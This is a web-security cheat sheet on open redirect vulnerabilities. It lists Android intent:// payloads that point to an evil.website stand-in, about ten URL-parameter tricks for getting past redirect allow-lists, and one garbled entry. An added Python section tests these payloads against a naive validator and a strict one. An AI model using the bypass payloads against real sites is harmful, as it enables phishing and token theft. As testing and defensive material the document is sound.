Open Redirect
What is it?
Exploitation
Example Payloads
Open redirect example from @sirdarckcat
http://evilwebsite.com/xss.php?redir_xss=intent://anyhostname.com/anypath?etc#Intent;package=x;S.browser_fallback_url=https://envil.website;end;%20
Shorter payload:
intent://anyhostname.com#Intent;scheme=evil.website;end
Cheat sheet
Basic Attack [ref1]
?url=https://www.hahwul.com
Open Redirect bypass pattern
?url=https://allow_domain.hahwul.com
?url=https://[email protected]
?url=https://www.hahwul.com#allow_domain
?url=https://www.hahwul.com?allow_domain
?url=https://www.hahwul.com\allow_domain
?url=https://www.hahwul.com&allow_domain
?url=http:///////////www.hahwul.com
?url=http:\\www.hahwul.com
?url=http:\/\/www.hahwul.com
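As an added example (not part of the original cheat sheet), the following Python runs the bypass patterns above against two server-side redirect validators: a substring check of the kind these patterns defeat, and a parse-then-exact-host-match check that rejects them. The `allow_domain` allow-list entry and the userinfo (`@`) variant are assumptions made for the example.

```python
from urllib.parse import urlsplit

# Constructed allow-list; "allow_domain" mirrors the placeholder in the payloads above.
ALLOWED_HOSTS = {"allow_domain"}

# The bypass patterns listed above, re-typed as test input; the userinfo
# variant ("@") is a constructed stand-in for the garbled entry in the list.
BYPASS_PAYLOADS = [
    "https://allow_domain.hahwul.com",
    "https://allow_domain@www.hahwul.com",
    "https://www.hahwul.com#allow_domain",
    "https://www.hahwul.com?allow_domain",
    "https://www.hahwul.com\\allow_domain",
    "https://www.hahwul.com&allow_domain",
    "http:///////////www.hahwul.com",
    "http:\\\\www.hahwul.com",
    "http:\\/\\/www.hahwul.com",
    "intent://anyhostname.com#Intent;scheme=evil.website;end",
]


def naive_is_safe(url: str) -> bool:
    """Substring check of the kind these patterns are built to fool."""
    return "allow_domain" in url


def strict_is_safe(url: str) -> bool:
    """Parse first, then compare the host exactly; reject anything unusual."""
    # Browsers and server-side parsers disagree on backslashes and control
    # characters, so refuse them before parsing at all.
    if any(c == "\\" or ord(c) < 0x20 or ord(c) == 0x7F for c in url):
        return False
    # A site-relative path is fine, but "//host" is scheme-relative: reject it.
    if url.startswith("/"):
        return not url.startswith("//")
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False            # intent://, javascript:, data: ...
    if "@" in parts.netloc:
        return False            # userinfo trick: allow_domain@evil-host
    # urlsplit yields no hostname for "http:///..." so those fail here too.
    return parts.hostname in ALLOWED_HOSTS


def bypass_report() -> dict:
    """Count how many of the listed payloads each validator lets through."""
    return {
        "naive": sum(naive_is_safe(p) for p in BYPASS_PAYLOADS),
        "strict": sum(strict_is_safe(p) for p in BYPASS_PAYLOADS),
    }
```

Exact host comparison after parsing is what closes the whole list; a prefix, suffix or substring match on the raw string leaves at least one pattern open.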
Other Resources
swisskyrepo's PayloadsAllTheThings https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect/Intruder
Hijacking accounts by retrieving JWT tokens via unvalidated redirects https://www.shawarkhan.com/2019/01/hijacking-accounts-by-retrieving-jwt.html
References
[ref1] : https://www.hahwul.com/p/ssrf-open-redirect-cheat-sheet.html?m=1